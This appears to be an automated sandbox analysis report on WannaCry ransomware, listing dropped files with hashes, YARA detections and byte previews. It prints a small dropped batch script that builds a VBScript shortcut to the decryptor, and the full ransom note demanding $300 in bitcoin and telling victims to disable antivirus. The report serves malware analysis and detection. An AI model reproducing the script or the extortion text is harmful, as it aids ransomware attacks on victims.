                                                                              Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-10-04 06:00:00..fresh-until 2024-10-04 07:00:00..valid-until 2024-10-04 09:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:b.out overlay separate pure segmented executable V2.3 V3.0 86 Large Text Large Data Huge Objects Enabled
                                                                              Category:dropped
                                                                              Size (bytes):276
                                                                              Entropy (8bit):7.083860485807806
                                                                              Encrypted:false
                                                                              SSDEEP:6:mtNnRdyR7ex4IFN+xs/OcgDFhGre52hRyH+:YnLyR7eiWYx2O7Dero6ye
                                                                              MD5:BF5E8C24028EB806178B0C9BF0F0AA17
                                                                              SHA1:7CFFC75ADC1E052775A6685E71DF35A69DFD2F5C
                                                                              SHA-256:A7375C1652651B03717E478353BD487BEDB4BE1B771361FA0063FE2076AF7EC7
                                                                              SHA-512:AD546D982586A6813713DF59928FA65B08F972BAA3191F97A66E5CD60BE7E1B86A57B752AA138746BD6F804D6D391AD9F5591F9CA18503FECACDD5C125206BB7
                                                                              Malicious:true
                                                                              Preview:........RSA1..........3.. tEy..o..........Q-.u%... E.C...`L.Q...|....@[...x.....S.08.-y.G...s...Z..".I.|.!GL!.J.S...b...#.R.... JY)....._....t@.\.78A.M....Z.`...9..]j(:6JY....T#..!#o..n.../.L#...q.O.qI.L.#R.+..|Y'^..f.. *.f(..|...Mu/|..|..0.x...;...dE.....r;..^.4..r.0.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):136
                                                                              Entropy (8bit):1.5584218964877468
                                                                              Encrypted:false
                                                                              SSDEEP:3:o+lta7ll/PtFChtl:Zo7/w
                                                                              MD5:A8ADB5BB23721F7943F03708746B1E70
                                                                              SHA1:F357076D9E7CAB7F158876FC2C2042A4F1DB3022
                                                                              SHA-256:FEFD2739A55ECDBA6682A093272D85D83AC01C6431F7DF6B897F0F603DC4115F
                                                                              SHA-512:AE4DBB1CD00667D8E3A6FE564891F5CD3DA59AFB20EC5AFFE397C4BFBD7012AEAC924F54AC87E7A6AFD273F76A287F17BE295F54ABC8A87E6C0DB5F0807542E1
                                                                              Malicious:false
                                                                              Preview:<..?.$=...........................................................................................f................o..g..f....8.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                                                              Category:dropped
                                                                              Size (bytes):320
                                                                              Entropy (8bit):5.029050652401917
                                                                              Encrypted:false
                                                                              SSDEEP:6:hqn4+B9TsHvRoJgpPsHvRoJ0F9a2T2ZLT2Ln:Q4+B9IHkHcrT2r
                                                                              MD5:DAB77EA2FBDDB1D0E637BAFF460DEB13
                                                                              SHA1:5FEBD125BC6D54400881240656CE5AAB69D2C019
                                                                              SHA-256:CCC9AC92CF2F4625D68F3856CE67BB344F7277523E87BBEA5055EE96014B141F
                                                                              SHA-512:2486F61BAEE1CCC9FDA4A212F00DFA9098B7972ECEB6369F6C43126989B742A52521DDD911C8EDA78A49B9093B48FC5C29E88A0BDF9866240D4BCA4D0D5D25D5
                                                                              Malicious:false
                                                                              Yara Hits:
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\7551728024260.bat, Author: Florian Roth
                                                                              Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                                              Category:dropped
                                                                              Size (bytes):1440054
                                                                              Entropy (8bit):0.3363393123555661
                                                                              Encrypted:false
                                                                              SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                                              MD5:C17170262312F3BE7027BC2CA825BF0C
                                                                              SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                                              SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                                              SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                                              Malicious:false
                                                                              Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):245760
                                                                              Entropy (8bit):6.278920408390635
                                                                              Encrypted:false
                                                                              SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                              MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                              SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                              SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                              SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                              Joe Sandbox View:
                                                                              • Filename: f_000112, Detection: malicious, Browse
                                                                              • Filename: WannaCry_2.EXE, Detection: malicious, Browse
                                                                              • Filename: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, Detection: malicious, Browse
                                                                              • Filename: LisectAVT_2403002A_126.EXE.exe, Detection: malicious, Browse
                                                                              • Filename: LisectAVT_2403002A_126.EXE.exe, Detection: malicious, Browse
                                                                              • Filename: LisectAVT_2403002A_223.exe, Detection: malicious, Browse
                                                                              • Filename: , Detection: malicious, Browse
                                                                              • Filename: , Detection: malicious, Browse
                                                                              • Filename: Request for Quotation (RFQ_196).zip.zip, Detection: malicious, Browse
                                                                              • Filename: , Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\cscript.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:true
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.770382246708573
                                                                              Encrypted:false
                                                                              SSDEEP:24:r6wFaywEi1v9f5d+Nha1iriIPpQJTE9be:r6wQ5dll
                                                                              MD5:1D23734919BD83A69E6D37912E4713DE
                                                                              SHA1:1703EA68CE23B9C5184866A3E0D7087C760EB911
                                                                              SHA-256:2DD1F2B2D359AAD5D5B0919784DE0B881BA79317095899FE926194A564ED92FB
                                                                              SHA-512:703FDCE92608F7AD3860AB06758B850D5561B68B888F85EFA5C132B3C000A091A9ABB2ADE457C701C6A86893F13940A32EA0BDC1367A7743458B823DC3A2FB21
                                                                              Malicious:false
                                                                              Preview:*G!.F?.@.O.@...>4e..k....VN.!.^M..F..g.+=..{....0......E...qn.8N..|...fZ.d....g...<.;..3.....*.R...v.;q.*\-1!..s...d.]...~.hP.C.C).v`.....M.=t.....?..+..W....QeA.W..~OQ..la.Q...O..c...@..&.uP+..dX....\.3.v|.....t 6.........|5...........%1.....iJ.8V.....3u.... O..y....|.9..9.s.6 ......r.EM.h.[..V.f.p.....]...5........1wk..".L...m.d.79......v.T.d...xZ.3.>.\..@W.@.4.^.D"......._.#.K.*]..B/.W...........^yC..._.p\E$..X<.a7t.G.i.T....b.~..0.B..M..["..E.Q+<....F.-..mW19..{45&.`.|...>..VA..Q...l..~..|..U..L6.mS..y".[.M9....k........@..&....G...).2r&X...@.....7.|.fu...)c2 .:?l.d.@...(l.P{..Qj..k..;.....c.c;2..3..m].3-.5.%...V.1.R...y.P.K.....(a./|...Zv..8.FM.......T.4.".-.......'.o5.E.r&.c..2OV3Ky..`0....d.M$..........+U..$)u.G....2"..q.I.b..%5.vA.ky.R....N.....zlG..26..oE.~......J..SX..\...x..ry.W....o.D..2.7.Q....'|..*....K......2.W!<.XJ......... F.@q.J?y..dB.g............8...i..A.Nw%...w`#...u ...t..B......'*.pV.N...D[fJ..R.3..M.....5.v.........6.V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.838508619977192
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkWr1lvxU/dhLA8sw/AB9/Gwy5wpryJ7MMOQFq+Hqo983+ip8:bkKmVHAB9+wycGMMO017jx
                                                                              MD5:66C80B47104C67C66075ABBD5B7FD253
                                                                              SHA1:C6C75476639B94216F9C57A7B081E37CE76453D4
                                                                              SHA-256:99DE1342DFEE8A91C6EE3481927D85CE570D57096DC7CB442BA7A4F068B8C1A5
                                                                              SHA-512:8B4E8077A96E257D4027041B18020A50B706B4750019E674533D22B257F3A0E9E7DC93F592B7C813E06FB31B74EBB71A13B0D323B468C0B4E4EBAF58353E4A99
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......""...B?"..!..r..vex.S...7......3.#.J.H...)..p^;'B%.-....*.sO\."Q..Q.P.Wfb.$.a.r......&......CY....iU...........VBD......J..6.(;.tZ.*#31hf......`..j././2...!0X%.e.^..a. <1c.y.._$...!..4..<C}..9.o(..T........Ar0.yI........`.Y..3(.....PX..f$..............{.'..mW.H.^.....I..{.Q..f.Z*.../....G.tj......`j0.....)...6.5.E.....}2...L.i_....a.m.+......z....6M....ge t..U.-.......mu.$Z+H..j.c(k.$..2..h@..~.1Cy.!.l...8..`IL...U.E........]|....O..9m.&7..}.=....;.2.i...........8%].Yu.V_..a. 1@..1...d....hr..z.z...o*...qM...'|.$.C.)Jv.....G|W.....(4.%!.....I..SIs..-.&...a.."n0..Mck/c.\...>..VB...."ms_i@....".`z.u.~6.6..*.b.../.7..O`.]..I.2K......o.M..M.(..4.q...D...x,....8..z.Roh.@.k.b......,%...lJ....f6.M.|_%..0r.]...Tt..#J...fM...4d$Z....n.v....)VP.f../>.Z.#....rvT..<w.3....4.Kg.E...k."M..!B..(.$.=.F.s<.AB...m.....y.z.3...b..o.D.c...1/.5]>.~`n...-J.Y....ll.."..=..>>.9.(.}........_`...$.....S.....N..t...C..}.{.f.....]V.|.D.B.....32IiuV
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.838508619977192
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkWr1lvxU/dhLA8sw/AB9/Gwy5wpryJ7MMOQFq+Hqo983+ip8:bkKmVHAB9+wycGMMO017jx
                                                                              MD5:66C80B47104C67C66075ABBD5B7FD253
                                                                              SHA1:C6C75476639B94216F9C57A7B081E37CE76453D4
                                                                              SHA-256:99DE1342DFEE8A91C6EE3481927D85CE570D57096DC7CB442BA7A4F068B8C1A5
                                                                              SHA-512:8B4E8077A96E257D4027041B18020A50B706B4750019E674533D22B257F3A0E9E7DC93F592B7C813E06FB31B74EBB71A13B0D323B468C0B4E4EBAF58353E4A99
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......""...B?"..!..r..vex.S...7......3.#.J.H...)..p^;'B%.-....*.sO\."Q..Q.P.Wfb.$.a.r......&......CY....iU...........VBD......J..6.(;.tZ.*#31hf......`..j././2...!0X%.e.^..a. <1c.y.._$...!..4..<C}..9.o(..T........Ar0.yI........`.Y..3(.....PX..f$..............{.'..mW.H.^.....I..{.Q..f.Z*.../....G.tj......`j0.....)...6.5.E.....}2...L.i_....a.m.+......z....6M....ge t..U.-.......mu.$Z+H..j.c(k.$..2..h@..~.1Cy.!.l...8..`IL...U.E........]|....O..9m.&7..}.=....;.2.i...........8%].Yu.V_..a. 1@..1...d....hr..z.z...o*...qM...'|.$.C.)Jv.....G|W.....(4.%!.....I..SIs..-.&...a.."n0..Mck/c.\...>..VB...."ms_i@....".`z.u.~6.6..*.b.../.7..O`.]..I.2K......o.M..M.(..4.q...D...x,....8..z.Roh.@.k.b......,%...lJ....f6.M.|_%..0r.]...Tt..#J...fM...4d$Z....n.v....)VP.f../>.Z.#....rvT..<w.3....4.Kg.E...k."M..!B..(.$.=.F.s<.AB...m.....y.z.3...b..o.D.c...1/.5]>.~`n...-J.Y....ll.."..=..>>.9.(.}........_`...$.....S.....N..t...C..}.{.f.....]V.|.D.B.....32IiuV
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81519656571167
                                                                              Encrypted:false
                                                                              SSDEEP:24:DPTU1Vkh2HCazvqiXMT1AXh73w4k/cTHw1/0fg+FO:XU1VkhEbLqiXMT+Xh7dMcTHw1t
                                                                              MD5:53806665CFA520EA93722CAC8602FE77
                                                                              SHA1:062091F00494A484464B7B9D7E45D111E65A264B
                                                                              SHA-256:E1387A9278634BED4E351836A7FB45DE74CA23CE5873458B7A4494EFD4E53377
                                                                              SHA-512:03A9967D0FAB9AEB3D125A8C270E0DFECE079903312CB1EC8B0D76E3FF94BB880C2A655014050FE69701DEF72E7E14A11EC04BF6EC4077A95C56A30D14B2CB02
                                                                              Malicious:false
                                                                              Preview:..Dv..%........Eu.u.._...w.....5L..>..6...k.f..#.!.."o................O...zP.P`F,....!..H.w'....A.i.<e...Q..bW..w....c.G..?z...T.......l.2..........!.!.....t._..U.M#o2...5.0....8..bpE...4!i...>..Cya....c....."...3D..n..+e..r.{....3...D.c.....U.#..ry^o~?(;..q..L.c..~.A ..4.8..NNF.F....@....6}'....P'.1...T"hr.....R.|=.%J...:..P._I.F.Y.n4..%....I..AV.<..U....Wqm^Z...R.o).}..4dEU@.h....K....=^.I.K._w.....M...r.Nu..d.............s.ec...q.yO...x..Sm.5.d@@ty`.q.:.0.@(.O../@L..JQ;...a|......PaI...(......Zh...H;...a.~.h.N.F;....".$....`?...cU....`....#~..k.M..3...@.....g.9.Q.H.|...2i.....]e!~.Y...O.j.........CF.f.L..=y..0.f....hI.......2d....A.W.....bhcE..^ac..t...&....x.....#..p......Pz....TE,..r~..1...bL..2....G..:?..K.B<W'Z....|2....`..f.........._....A...~'......K,..P.PCPP...V.....r..O......7h1U.R..>.7.E.,.V.;..Hj..O..H"..#....1.R.v._].Z...,V.'B}..SD.-6-..)'.RV{,.b\...A`Th...Cdx.ev...s.6....~MK..h...d........#....:H..SAf.k/y.d.........].~[
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852250209755696
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdUZQoipolEzvghlNptveTlIqEuJvKX5V/QoNTnzg6p8hXTr7:bkdUZApolEYXuJIJuJvKJXB0Tjr7
                                                                              MD5:F05C25BAAA9756F9BDF186EB77A1C968
                                                                              SHA1:969EB4119EF8666E6B69980F5E8C1E1BE922EEE4
                                                                              SHA-256:6A13D5F31B368161C85BFC953BCF0FDF048391534B1E56301D98AA4A22E38A28
                                                                              SHA-512:25C8ABAF61E768445460768083977AE2B09D31F99CB80D591A5DB67F265EB542A9DA51974CBBF0D2807ED415CB30ADFF8565D07CBE35CDFF4FB3E8DCFAB397AC
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<...2B.b...s......--......'.`...2K'....n.u...$.>{.%..c.o.Y...l..,2.....-}.c.WX3...|Z.).5y...p@.~Z$h...j~7.f.Q.......K.I...EY.n.>.a4q.K.&%.....p..fa.[q.w..$..WKp.A....S......A....(...p....O..Ld. V/.k...se.._W]..yV.l.\@...d.3..U.u@@{...\..9.H.-!.n0.+.............L..{........3...Ym3.q..a.......X.U.)F ..y...0...=....3q...O..e....]../.F.r_...z.w-..1:...d.].u..y..~jr.n.]T.0+.;....w9..l.;....).LV;..Y...'...F..\........u.cK.ax..S..0.A..T..z.b6...}pr.%...2......Q(.......<........An.*%:..zV.slz.|.s.#Z.[CV.i.c.....L..]..<.>3ST.....{.O....7B^\..../...;.t...Z....j.H)z.t2....X..it........4...GBb..A......b.:[....r_<.g~2..n...|..4...Hu.J.B.4...{.?........g.6@..{_.......,.]s....C..y.......h.[..o6...:.1....8*tX.+..\..H....c.....0....9.9m......1|...W_.(.....n>R....'..vB.6.c....H%.dY..%...#.].Q[.m..e....*.V...P..s...>..m...\h.VDd).T.mR..m.`.1H|...]TU.).."5.0.~\...dng...1.b6..F.G]@..h^m._^s....*...zz#../"..<....."..,j.xPp.Y.h..'=.0h..y`.......#8^R...`.6.D.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852250209755696
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdUZQoipolEzvghlNptveTlIqEuJvKX5V/QoNTnzg6p8hXTr7:bkdUZApolEYXuJIJuJvKJXB0Tjr7
                                                                              MD5:F05C25BAAA9756F9BDF186EB77A1C968
                                                                              SHA1:969EB4119EF8666E6B69980F5E8C1E1BE922EEE4
                                                                              SHA-256:6A13D5F31B368161C85BFC953BCF0FDF048391534B1E56301D98AA4A22E38A28
                                                                              SHA-512:25C8ABAF61E768445460768083977AE2B09D31F99CB80D591A5DB67F265EB542A9DA51974CBBF0D2807ED415CB30ADFF8565D07CBE35CDFF4FB3E8DCFAB397AC
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<...2B.b...s......--......'.`...2K'....n.u...$.>{.%..c.o.Y...l..,2.....-}.c.WX3...|Z.).5y...p@.~Z$h...j~7.f.Q.......K.I...EY.n.>.a4q.K.&%.....p..fa.[q.w..$..WKp.A....S......A....(...p....O..Ld. V/.k...se.._W]..yV.l.\@...d.3..U.u@@{...\..9.H.-!.n0.+.............L..{........3...Ym3.q..a.......X.U.)F ..y...0...=....3q...O..e....]../.F.r_...z.w-..1:...d.].u..y..~jr.n.]T.0+.;....w9..l.;....).LV;..Y...'...F..\........u.cK.ax..S..0.A..T..z.b6...}pr.%...2......Q(.......<........An.*%:..zV.slz.|.s.#Z.[CV.i.c.....L..]..<.>3ST.....{.O....7B^\..../...;.t...Z....j.H)z.t2....X..it........4...GBb..A......b.:[....r_<.g~2..n...|..4...Hu.J.B.4...{.?........g.6@..{_.......,.]s....C..y.......h.[..o6...:.1....8*tX.+..\..H....c.....0....9.9m......1|...W_.(.....n>R....'..vB.6.c....H%.dY..%...#.].Q[.m..e....*.V...P..s...>..m...\h.VDd).T.mR..m.`.1H|...]TU.).."5.0.~\...dng...1.b6..F.G]@..h^m._^s....*...zz#../"..<....."..,j.xPp.Y.h..'=.0h..y`.......#8^R...`.6.D.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.812986456990108
                                                                              Encrypted:false
                                                                              SSDEEP:24:uOxqi8a8+CApvyU8PhVZncmCD79MuiGs+aIOXmsyzuDx1G6:ii1CUqU8ZVNxqQD9XgYx11
                                                                              MD5:1E98877B9A56680A9EC3F9000021023E
                                                                              SHA1:8CD0DB6DC0058FB9614B12166FC2E2082044E1A9
                                                                              SHA-256:780B4676AB080A054AFBED7E2BB867787E3739BFCCC33AE3350274D8CE7AA5EA
                                                                              SHA-512:59D7730FCD8D545E234AFC5F583466FBB8740D06AF9ED3FA882EAE47B006FB54E7495CAC73E2E6D50765B1CF67A435C9945BA47A31C4E1884F3F230AF13EBC92
                                                                              Malicious:false
                                                                              Preview:Q....Eo......TGErZ..P"..?...7u....9..Rh.....x5.)..'.%;...l...P.M]::..T..%.^...x.@............{..........m~..'.q.M.+C^....K.&`..yW./...O.l....K..t.Qo.0...=..:l.6.9.7E...S...C..".....vl]E..+...Sj......,../.....b......R......9..N..&F...{Wo..YN\.?...Hf}j.Rg...J...PI...D...9.&I&..d..kz.R?}..~.....~.......y.H..f80...5.A...*.A..B.<.....3.(...2.<..qw......e.Av.%.Q&.>.mU.;.....!..^..y.......o...*0.t.n.V0...sFrc-Y*1....)..Y.i.<..S...[..../...z...&.1.......v.y*.g........m."1....5.h.8f..<_'...|.-.i^.......Sj..A2.7<.....G....1.A^Y7[~.Ch$..E......Z"./..sk.i.??3.K..F...LZ.G.NQ.r.........8.=.0.O/p'.*[.0}4.:...#.t.+..x.tv..a..[-.^...O..dx.yRN..u2...2"...#..~1.+...m.:N..}@{......y.('.....R..(G..L..PW.5.h...9..l...x...1.....;......7.:.:....i1m..A.%*.i...-7.Zw].V6...p~..q7..Z.G....^.Q..?wQ).:.=....e[...V....l=.6..7.x.]r."..M.d06........).@..6.".V.O..8..4.*.$C..x?.F...%."9+a.r.......U.vW......kM.C................#.I)..T|j.U/X..s...[aS..g.|(.g.3........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.876030021147738
                                                                              Encrypted:false
                                                                              SSDEEP:24:bksnlfQKSgRkldtYB4TZSP8woHOUXrHMexUgIg4bp75YFYlK2uzg/0Y:bksnlf3SgRZ20PcHVXlIPRM32uzVY
                                                                              MD5:903E82FB6BF7BEC22E4C0FDFE6A508CF
                                                                              SHA1:0B877B5EC9B1CFE34D62F6D805A071E89F426DEF
                                                                              SHA-256:99D6E2998388280B2D8A1DEC46A5E0CA414DA376359B00BAE250FD92D1655BCC
                                                                              SHA-512:770EA2BE3220C99DF3EF138D1EE7427635F40730A706B7078F114B6C91960501DA3DBE4EBE092A71B386B2E55A650E9FC81BD94BC0CE9718B245CA041C64AD6B
                                                                              Malicious:false
